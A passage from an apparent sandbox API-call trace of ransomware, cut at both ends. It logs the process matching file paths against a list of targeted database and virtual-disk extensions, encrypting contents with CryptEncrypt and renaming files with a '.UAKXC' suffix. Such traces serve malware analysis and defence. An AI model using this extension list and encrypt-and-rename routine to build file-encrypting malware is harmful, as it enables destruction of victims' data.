Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsd") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nvram") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmx") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".raw") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qcow2") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".subvol") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bin") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vsv") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avhd") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmrs") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhdx") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avdx") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmcx") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".iso") returned 0x0 [0151.071] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.071] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0151.251] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0151.251] SetEndOfFile (hFile=0x6f0) returned 1 [0151.254] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.254] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x648, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x648, lpOverlapped=0x0) returned 1 [0151.254] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfffff9b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.254] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x648, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x648, lpOverlapped=0x0) returned 1 [0151.254] CloseHandle (hObject=0x6f0) returned 1 [0151.258] GetProcessHeap () returned 0xea0000 [0151.258] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0151.259] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" [0151.259] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" [0151.259] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.uakxc")) returned 1 [0151.259] GetProcessHeap () returned 0xea0000 [0151.260] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0151.260] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef58c0 | out: hHeap=0xea0000) returned 1 [0151.260] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac90 | out: hHeap=0xea0000) returned 1 [0151.260] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0151.260] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0151.260] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0151.264] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 0x2020 [0151.264] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0151.264] GetLastError () returned 0x0 [0151.264] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=3186) returned 1 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".4dd") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".4dl") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".accdb") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".accdc") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".accde") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".accdr") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".accdt") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".accft") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".adb") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".ade") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".adf") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".adp") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".arc") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".ora") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".alf") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".ask") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".btr") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".bdf") returned 0x0 [0151.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".cat") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".cdb") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".ckp") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".cma") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".cpd") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dacpac") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dad") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dadiagrams") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".daschema") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".db") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".db-shm") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".db-wal") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".db3") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dbc") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dbf") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dbs") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dbt") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dbv") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dbx") returned 0x0 [0151.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dcb") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dct") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dcx") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".ddl") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dlis") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dp1") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dqy") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dsk") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dsn") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dtsx") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".dxl") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".eco") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".ecx") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".edb") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".epim") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".exb") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".fcd") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".fdb") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".fic") returned 0x0 [0151.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".fmp") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".fmp12") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".fmpsl") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".fol") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".fp3") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".fp4") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".fp5") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".fp7") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".fpt") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".frm") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".gdb") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".grdb") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".gwi") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".hdb") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".his") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".ib") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".idb") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".ihx") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".itdb") returned 0x0 [0151.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".itw") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".jet") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".jtx") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".kdb") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".kexi") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".kexic") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".kexis") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".lgc") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".lwx") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".maf") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".maq") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".mar") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".mas") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".mav") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".mdb") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".mdf") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".mpd") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".mrg") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".mud") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".mwb") returned 0x0 [0151.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".myd") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".ndf") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".nnt") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".nrmlib") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".ns2") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".ns3") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".ns4") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".nsf") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".nv") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".nv2") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".nwdb") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".nyf") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".odb") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".oqy") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".orx") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".owc") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".p96") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".p97") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".pan") returned 0x0 [0151.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".pdb") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".pdm") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".pnz") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".qry") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".qvd") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".rbf") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".rctd") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".rod") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".rodx") returned 0x0 [0151.271] StrStrIW 